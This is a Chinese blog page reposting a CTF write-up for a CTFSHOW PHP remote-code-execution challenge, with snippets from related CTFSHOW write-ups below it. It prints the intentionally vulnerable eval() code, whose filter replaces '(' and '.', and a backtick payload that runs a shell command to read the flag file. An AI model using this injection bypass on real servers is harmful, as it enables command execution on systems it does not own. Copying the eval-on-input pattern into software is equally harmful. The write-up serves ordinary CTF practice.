首页 > 其他分享 >CTFSHOW

CTFSHOW

时间:2023-05-27 20:45:28浏览次数:35  
标签:code pyaload echo CTFSHOW f1agaaa cat

RCE挑战1

<?php

error_reporting(0);
highlight_file(__FILE__);

$code = $_POST['code'];

$code = str_replace("(","括号",$code);

$code = str_replace(".","点",$code);

eval($code);

?>

把"."和"("进行了过滤,我们可以用``进行命令执行。

POST:

pyaload:code=echo `cat /f1agaaa`;

标签:code,pyaload,echo,CTFSHOW,f1agaaa,cat
From: https://www.cnblogs.com/kode00/p/17437262.html

相关文章

  • ctfshow终极考核
    信息收集这个环境就只涉及目录扫描了[18:04:02]200-43B-/.bowerrc[18:04:03]200-34B-/.gitignore[18:04:04]200-2KB-/.travis.yml[18:04:24]200-3KB-/page.php[18:04:28]200-19B-/robots.txt/robots.txt得到source.txt访问发......
  • ctfshow php特性
    web111源代码highlight_file(__FILE__);error_reporting(0);include("flag.php");functiongetFlag(&$v1,&$v2){eval("$$v1=&$$v2;");//这里是一个赋值语句把v2的值复制下面通过get获得的$$v1值var_dump($$v1);//打印$$v1的值}if(isset($_......
  • 《CTFshow-Web入门》08. Web 71~80
    目录web71知识点题解web72知识点题解web73题解web74题解web75知识点题解web76题解web77知识点题解web78知识点题解web79题解web80知识点题解ctf-web入门web71知识点ob_get_contents():得到输出缓冲区的内容。ob_end_clean():清除缓冲区的内容,并将缓冲区关闭,但不会输出内......
  • 《CTFshow-Web入门》07. Web 61~70
    目录web61~65题解web66知识点题解web67知识点题解web68知识点题解web69知识点题解web70知识点题解ctf-web入门web61~65题解这几个题都和web58一样。可能内部禁用的函数不一样吧。但payload都差不多。不多解释了。以下解法随便挑一个即可。可能不同题会有部分函数被......
  • ctfshow-菜狗杯-wp
    MISCmisc1下载附件解压misc2下载附件解压发现解压不了用010打开发现是png图片后缀改为png文字识别一下就好了CRYPTO签到密码16进制转字符串caesar根据题目发现是凯撒直接离线工具一把梭可以发现在3时出现flag加上头部提交即可0x36d16进制的密码转为10进制......
  • ctfshow web入门 sql注入 web 183-186
    web183-web186涉及盲注,不管是时间盲注还是布尔盲注,若用手工,会非常耗时,通常使用脚本重点:​ 1、了解python脚本编写​ 2、了解条件语句(where、having)区别​ 3、了解sql语句位运算符​ 4、了解mysql特性​ 5、扩展了解简单爬虫目录web183web184web185web186web183//拼......
  • ctfshow 第三届愚人杯 pwn wp
    想起自己貌似没有发过比赛的wp,也完完整整地参加了好几个比赛,之后会陆续发ctfshow愚人杯做完pwn方向的题目就溜了,拿了三个一血、两个二血。感觉自己棒棒哒。easy_checkin把show功能函数放在堆块上且自带后门的题目,存放UAF漏洞,修改下show功能函数为后门函数再利用U......
  • CTFSHOW 萌新web10-21
    ctfshow萌新web10-21web10题目提示flag在congfig.php中php中作为执行系统命令的函数:system()passthru()exec()shell_exec()popen()proc_open()pcntl_exec()源码中过滤了system,exec,highlight这三个常用的PHP命令执行函数,绕过过滤条件就可以使用eval()函数执行PH......
  • ctfshow web入门 sql注入 171-175
    171-175同属无过滤绕过(并未对sql语句过滤,仅对查询结果过滤)重点:1、了解万能密码2、了解sql语句中字符串函数3、了解备份功能(导入/导出数据)4、蚁剑如何连接数据库web171$sql="selectusername,passwordfromuserwhereusername!='flag'andid=......
  • ctfshow-web4(Nginx日志写shell)
    这是一道有关Nginx日志文件写入shell的题目。  一、基础知识/etc/nginx/nginx.conf:该文件是Ngnix的配置的文件,该文件保存着能够影响服务器运行的配置信息。有时会泄露敏感信息。该文件支持php解析。/var/log/nginx/access.log:该文件是Ngnix的访问日志文件,Ngnix会把每个......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99